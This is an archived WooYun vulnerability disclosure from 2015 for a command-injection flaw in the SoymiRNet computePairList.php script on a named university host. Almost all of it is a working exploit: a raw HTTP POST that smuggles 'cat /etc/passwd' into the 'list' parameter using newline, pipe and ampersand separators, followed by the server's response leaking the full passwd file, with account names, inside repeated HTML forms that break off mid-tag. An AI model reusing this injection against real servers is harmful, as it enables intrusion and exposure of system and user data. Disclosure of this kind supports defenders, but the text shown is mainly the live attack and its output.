乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
1、命令执行
POST /SoymiRNet/computePairList.php HTTP/1.1Content-Length: 145Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=anklt8qta6kjl0hcrhj8kbus32; JSESSIONID=7A7CFED089A48A65B9F34686F092DD8B;Host: nclab.hit.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*submit=Submit&asp=bp&ddg=10&gu=0&list=%0acat /etc/passwd%7ccat /etc/passwd%26cat /etc/passwd%0a&loop=0&mis=0&pi=PITA&ps=psRNAT&seed=5&ta=TAPIRHTTP/1.1 200 OKServer: nginx/1.6.2Date: Sun, 22 Nov 2015 07:46:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 41191Connection: keep-aliveX-Powered-By: PHP/5.4.4-14+deb7u14Vary: Accept-Encodingdocument.form11.list.value="root:x:0:0:root:/root:/bin/bash";document.form21.list.value="";document.formo1.list.value="";document.form11.mir.value="";document.form21.mir.value="";document.formo1.mir.value="\t";</script><form id="form1"2 name="form12" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"2 name="form22" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"2 name="formo2" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim2" type="hidden" id="sim2" value="daemon:x:1:1:daemon:/usr/sbin:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim2); document.form12.list.value="daemon:x:1:1:daemon:/usr/sbin:/bin/sh";document.form22.list.value="";document.formo2.list.value="";document.form12.mir.value="";document.form22.mir.value="";document.formo2.mir.value="\t";</script><form id="form1"3 name="form13" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"3 name="form23" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"3 name="formo3" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim3" type="hidden" id="sim3" value="bin:x:2:2:bin:/bin:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim3); document.form13.list.value="bin:x:2:2:bin:/bin:/bin/sh";document.form23.list.value="";document.formo3.list.value="";document.form13.mir.value="";document.form23.mir.value="";document.formo3.mir.value="\t";</script><form id="form1"4 name="form14" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"4 name="form24" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"4 name="formo4" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim4" type="hidden" id="sim4" value="sys:x:3:3:sys:/dev:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim4); document.form14.list.value="sys:x:3:3:sys:/dev:/bin/sh";document.form24.list.value="";document.formo4.list.value="";document.form14.mir.value="";document.form24.mir.value="";document.formo4.mir.value="\t";</script><form id="form1"5 name="form15" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"5 name="form25" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"5 name="formo5" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim5" type="hidden" id="sim5" value="sync:x:4:65534:sync:/bin:/bin/sync" /><script type="text/javascript"> var asp="bp"; printtable(sim5); document.form15.list.value="sync:x:4:65534:sync:/bin:/bin/sync";document.form25.list.value="";document.formo5.list.value="";document.form15.mir.value="";document.form25.mir.value="";document.formo5.mir.value="\t";</script><form id="form1"6 name="form16" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"6 name="form26" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"6 name="formo6" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim6" type="hidden" id="sim6" value="games:x:5:60:games:/usr/games:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim6); document.form16.list.value="games:x:5:60:games:/usr/games:/bin/sh";document.form26.list.value="";document.formo6.list.value="";document.form16.mir.value="";document.form26.mir.value="";document.formo6.mir.value="\t";</script><form id="form1"7 name="form17" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"7 name="form27" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"7 name="formo7" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim7" type="hidden" id="sim7" value="man:x:6:12:man:/var/cache/man:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim7); document.form17.list.value="man:x:6:12:man:/var/cache/man:/bin/sh";document.form27.list.value="";document.formo7.list.value="";document.form17.mir.value="";document.form27.mir.value="";document.formo7.mir.value="\t";</script><form id="form1"8 name="form18" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"8 name="form28" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"8 name="formo8" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim8" type="hidden" id="sim8" value="lp:x:7:7:lp:/var/spool/lpd:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim8); document.form18.list.value="lp:x:7:7:lp:/var/spool/lpd:/bin/sh";document.form28.list.value="";document.formo8.list.value="";document.form18.mir.value="";document.form28.mir.value="";document.formo8.mir.value="\t";</script><form id="form1"9 name="form19" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"9 name="form29" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"9 name="formo9" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim9" type="hidden" id="sim9" value="mail:x:8:8:mail:/var/mail:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim9); document.form19.list.value="mail:x:8:8:mail:/var/mail:/bin/sh";document.form29.list.value="";document.formo9.list.value="";document.form19.mir.value="";document.form29.mir.value="";document.formo9.mir.value="\t";</script><form id="form1"10 name="form110" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"10 name="form210" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"10 name="formo10" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim10" type="hidden" id="sim10" value="news:x:9:9:news:/var/spool/news:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim10); document.form110.list.value="news:x:9:9:news:/var/spool/news:/bin/sh";document.form210.list.value="";document.formo10.list.value="";document.form110.mir.value="";document.form210.mir.value="";document.formo10.mir.value="\t";</script><form id="form1"11 name="form111" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"11 name="form211" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"11 name="formo11" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim11" type="hidden" id="sim11" value="uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim11); document.form111.list.value="uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh";document.form211.list.value="";document.formo11.list.value="";document.form111.mir.value="";document.form211.mir.value="";document.formo11.mir.value="\t";</script><form id="form1"12 name="form112" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"12 name="form212" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"12 name="formo12" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim12" type="hidden" id="sim12" value="proxy:x:13:13:proxy:/bin:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim12); document.form112.list.value="proxy:x:13:13:proxy:/bin:/bin/sh";document.form212.list.value="";document.formo12.list.value="";document.form112.mir.value="";document.form212.mir.value="";document.formo12.mir.value="\t";</script><form id="form1"13 name="form113" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"13 name="form213" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"13 name="formo13" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim13" type="hidden" id="sim13" value="www-data:x:33:33:www-data:/var/www:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim13); document.form113.list.value="www-data:x:33:33:www-data:/var/www:/bin/sh";document.form213.list.value="";document.formo13.list.value="";document.form113.mir.value="";document.form213.mir.value="";document.formo13.mir.value="\t";</script><form id="form1"14 name="form114" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"14 name="form214" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"14 name="formo14" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim14" type="hidden" id="sim14" value="backup:x:34:34:backup:/var/backups:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim14); document.form114.list.value="backup:x:34:34:backup:/var/backups:/bin/sh";document.form214.list.value="";document.formo14.list.value="";document.form114.mir.value="";document.form214.mir.value="";document.formo14.mir.value="\t";</script><form id="form1"15 name="form115" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"15 name="form215" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"15 name="formo15" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim15" type="hidden" id="sim15" value="list:x:38:38:Mailing List Manager:/var/list:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim15); document.form115.list.value="list:x:38:38:Mailing List Manager:/var/list:/bin/sh";document.form215.list.value="";document.formo15.list.value="";document.form115.mir.value="";document.form215.mir.value="";document.formo15.mir.value="\t";</script><form id="form1"16 name="form116" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"16 name="form216" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"16 name="formo16" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim16" type="hidden" id="sim16" value="irc:x:39:39:ircd:/var/run/ircd:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim16); document.form116.list.value="irc:x:39:39:ircd:/var/run/ircd:/bin/sh";document.form216.list.value="";document.formo16.list.value="";document.form116.mir.value="";document.form216.mir.value="";document.formo16.mir.value="\t";</script><form id="form1"17 name="form117" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"17 name="form217" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"17 name="formo17" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim17" type="hidden" id="sim17" value="gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim17); document.form117.list.value="gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh";document.form217.list.value="";document.formo17.list.value="";document.form117.mir.value="";document.form217.mir.value="";document.formo17.mir.value="\t";</script><form id="form1"18 name="form118" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"18 name="form218" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"18 name="formo18" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim18" type="hidden" id="sim18" value="nobody:x:65534:65534:nobody:/nonexistent:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim18); document.form118.list.value="nobody:x:65534:65534:nobody:/nonexistent:/bin/sh";document.form218.list.value="";document.formo18.list.value="";document.form118.mir.value="";document.form218.mir.value="";document.formo18.mir.value="\t";</script><form id="form1"19 name="form119" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"19 name="form219" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"19 name="formo19" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim19" type="hidden" id="sim19" value="libuuid:x:100:101::/var/lib/libuuid:/bin/sh" /><script type="text/javascript"> var asp="bp"; printtable(sim19); document.form119.list.value="libuuid:x:100:101::/var/lib/libuuid:/bin/sh";document.form219.list.value="";document.formo19.list.value="";document.form119.mir.value="";document.form219.mir.value="";document.formo19.mir.value="\t";</script><form id="form1"20 name="form120" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"20 name="form220" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"20 name="formo20" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim20" type="hidden" id="sim20" value="Debian-exim:x:101:103::/var/spool/exim4:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim20); document.form120.list.value="Debian-exim:x:101:103::/var/spool/exim4:/bin/false";document.form220.list.value="";document.formo20.list.value="";document.form120.mir.value="";document.form220.mir.value="";document.formo20.mir.value="\t";</script><form id="form1"21 name="form121" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"21 name="form221" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"21 name="formo21" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim21" type="hidden" id="sim21" value="statd:x:102:65534::/var/lib/nfs:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim21); document.form121.list.value="statd:x:102:65534::/var/lib/nfs:/bin/false";document.form221.list.value="";document.formo21.list.value="";document.form121.mir.value="";document.form221.mir.value="";document.formo21.mir.value="\t";</script><form id="form1"22 name="form122" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"22 name="form222" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"22 name="formo22" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim22" type="hidden" id="sim22" value="chunyu:x:1000:1000:Chunyu Wang,,,:/home/chunyu:/bin/bash" /><script type="text/javascript"> var asp="bp"; printtable(sim22); document.form122.list.value="chunyu:x:1000:1000:Chunyu Wang,,,:/home/chunyu:/bin/bash";document.form222.list.value="";document.formo22.list.value="";document.form122.mir.value="";document.form222.mir.value="";document.formo22.mir.value="\t";</script><form id="form1"23 name="form123" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"23 name="form223" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"23 name="formo23" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim23" type="hidden" id="sim23" value="sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin" /><script type="text/javascript"> var asp="bp"; printtable(sim23); document.form123.list.value="sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin";document.form223.list.value="";document.formo23.list.value="";document.form123.mir.value="";document.form223.mir.value="";document.formo23.mir.value="\t";</script><form id="form1"24 name="form124" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"24 name="form224" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"24 name="formo24" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim24" type="hidden" id="sim24" value="nclab:x:1001:1001:,,,:/home/nclab:/bin/bash" /><script type="text/javascript"> var asp="bp"; printtable(sim24); document.form124.list.value="nclab:x:1001:1001:,,,:/home/nclab:/bin/bash";document.form224.list.value="";document.formo24.list.value="";document.form124.mir.value="";document.form224.mir.value="";document.formo24.mir.value="\t";</script><form id="form1"25 name="form125" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"25 name="form225" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"25 name="formo25" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim25" type="hidden" id="sim25" value="messagebus:x:104:106::/var/run/dbus:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim25); document.form125.list.value="messagebus:x:104:106::/var/run/dbus:/bin/false";document.form225.list.value="";document.formo25.list.value="";document.form125.mir.value="";document.form225.mir.value="";document.formo25.mir.value="\t";</script><form id="form1"26 name="form126" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"26 name="form226" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"26 name="formo26" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim26" type="hidden" id="sim26" value="avahi:x:105:107:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim26); document.form126.list.value="avahi:x:105:107:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false";document.form226.list.value="";document.formo26.list.value="";document.form126.mir.value="";document.form226.mir.value="";document.formo26.mir.value="\t";</script><form id="form1"27 name="form127" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"27 name="form227" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"27 name="formo27" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim27" type="hidden" id="sim27" value="mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim27); document.form127.list.value="mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false";document.form227.list.value="";document.formo27.list.value="";document.form127.mir.value="";document.form227.mir.value="";document.formo27.mir.value="\t";</script><form id="form1"28 name="form128" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"28 name="form228" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"28 name="formo28" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim28" type="hidden" id="sim28" value="openldap:x:107:111:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim28); document.form128.list.value="openldap:x:107:111:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false";document.form228.list.value="";document.formo28.list.value="";document.form128.mir.value="";document.form228.mir.value="";document.formo28.mir.value="\t";</script><form id="form1"29 name="form129" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"29 name="form229" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"29 name="formo29" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim29" type="hidden" id="sim29" value="guoer:x:1003:1003::/home/guoer:/bin/bash" /><script type="text/javascript"> var asp="bp"; printtable(sim29); document.form129.list.value="guoer:x:1003:1003::/home/guoer:/bin/bash";document.form229.list.value="";document.formo29.list.value="";document.form129.mir.value="";document.form229.mir.value="";document.formo29.mir.value="\t";</script><form id="form1"30 name="form130" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"30 name="form230" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"30 name="formo30" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim30" type="hidden" id="sim30" value="keky:x:1004:1004::/home/keky:/bin/bash" /><script type="text/javascript"> var asp="bp"; printtable(sim30); document.form130.list.value="keky:x:1004:1004::/home/keky:/bin/bash";document.form230.list.value="";document.formo30.list.value="";document.form130.mir.value="";document.form230.mir.value="";document.formo30.mir.value="\t";</script><form id="form1"31 name="form131" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"31 name="form231" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"31 name="formo31" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim31" type="hidden" id="sim31" value="hpsmh:x:108:112::/home/hpsmh:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim31); document.form131.list.value="hpsmh:x:108:112::/home/hpsmh:/bin/false";document.form231.list.value="";document.formo31.list.value="";document.form131.mir.value="";document.form231.mir.value="";document.formo31.mir.value="\t";</script><form id="form1"32 name="form132" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"32 name="form232" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"32 name="formo32" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim32" type="hidden" id="sim32" value="ftp:x:110:65534::/home/ftp:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim32); document.form132.list.value="ftp:x:110:65534::/home/ftp:/bin/false";document.form232.list.value="";document.formo32.list.value="";document.form132.mir.value="";document.form232.mir.value="";document.formo32.mir.value="\t";</script><form id="form1"33 name="form133" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"33 name="form233" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"33 name="formo33" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim33" type="hidden" id="sim33" value="privoxy:x:111:65534::/etc/privoxy:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim33); document.form133.list.value="privoxy:x:111:65534::/etc/privoxy:/bin/false";document.form233.list.value="";document.formo33.list.value="";document.form133.mir.value="";document.form233.mir.value="";document.formo33.mir.value="\t";</script><form id="form1"34 name="form134" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"34 name="form234" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"34 name="formo34" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim34" type="hidden" id="sim34" value="debian-tor:x:112:115::/var/lib/tor:/bin/bash" /><script type="text/javascript"> var asp="bp"; printtable(sim34); document.form134.list.value="debian-tor:x:112:115::/var/lib/tor:/bin/bash";document.form234.list.value="";document.formo34.list.value="";document.form134.mir.value="";document.form234.mir.value="";document.formo34.mir.value="\t";</script><form id="form1"35 name="form135" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"35 name="form235" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"35 name="formo35" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim35" type="hidden" id="sim35" value="vde2-net:x:113:116::/var/run/vde2:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim35); document.form135.list.value="vde2-net:x:113:116::/var/run/vde2:/bin/false";document.form235.list.value="";document.formo35.list.value="";document.form135.mir.value="";document.form235.mir.value="";document.formo35.mir.value="\t";</script><form id="form1"36 name="form136" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"36 name="form236" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"36 name="formo36" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim36" type="hidden" id="sim36" value="rainfox:x:1005:1005:,,,:/home/rainfox:/bin/bash" /><script type="text/javascript"> var asp="bp"; printtable(sim36); document.form136.list.value="rainfox:x:1005:1005:,,,:/home/rainfox:/bin/bash";document.form236.list.value="";document.formo36.list.value="";document.form136.mir.value="";document.form236.mir.value="";document.formo36.mir.value="\t";</script><form id="form1"37 name="form137" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"37 name="form237" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"37 name="formo37" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim37" type="hidden" id="sim37" value="tomcat6:x:109:120::/usr/share/tomcat6:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim37); document.form137.list.value="tomcat6:x:109:120::/usr/share/tomcat6:/bin/false";document.form237.list.value="";document.formo37.list.value="";document.form137.mir.value="";document.form237.mir.value="";document.formo37.mir.value="\t";</script><form id="form1"38 name="form138" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"38 name="form238" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"38 name="formo38" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim38" type="hidden" id="sim38" value="colord:x:114:123:colord colour management daemon,,,:/var/lib/colord:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim38); document.form138.list.value="colord:x:114:123:colord colour management daemon,,,:/var/lib/colord:/bin/false";document.form238.list.value="";document.formo38.list.value="";document.form138.mir.value="";document.form238.mir.value="";document.formo38.mir.value="\t";</script><form id="form1"39 name="form139" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"39 name="form239" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"39 name="formo39" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim39" type="hidden" id="sim39" value="saned:x:115:124::/home/saned:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim39); document.form139.list.value="saned:x:115:124::/home/saned:/bin/false";document.form239.list.value="";document.formo39.list.value="";document.form139.mir.value="";document.form239.mir.value="";document.formo39.mir.value="\t";</script><form id="form1"40 name="form140" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"40 name="form240" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"40 name="formo40" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim40" type="hidden" id="sim40" value="ntpd:x:116:125::/var/run/openntpd:/bin/false" /><script type="text/javascript"> var asp="bp"; printtable(sim40); document.form140.list.value="ntpd:x:116:125::/var/run/openntpd:/bin/false";document.form240.list.value="";document.formo40.list.value="";document.form140.mir.value="";document.form240.mir.value="";document.formo40.mir.value="\t";</script><form id="form1"41 name="form141" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="form2"41 name="form241" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><form id="formo"41 name="formo41" method="post" action="Target.php" target="_blank"><input type="hidden" name="list" /><input type="hidden" name="mir" /></form><input name="sim41" type="hidden" id="sim41" value="wechat:x:2042:1001:System User:/home/wechat:/bin/bash" /><script type="text/javascript"> var asp="bp"; printtable(sim41); document.form141.list.value="wechat:x:2042:1001:System User:/home/wechat:/bin/bash";document.form241.list.value="";document.formo41.list.value="";document.form141.mir.value="";document.form241.mir.value="";document.formo41.mir.value="\t";</script><form id="form1"42 name="form142" method="post" action="Target.php" target="_blank"><input type="hidden" 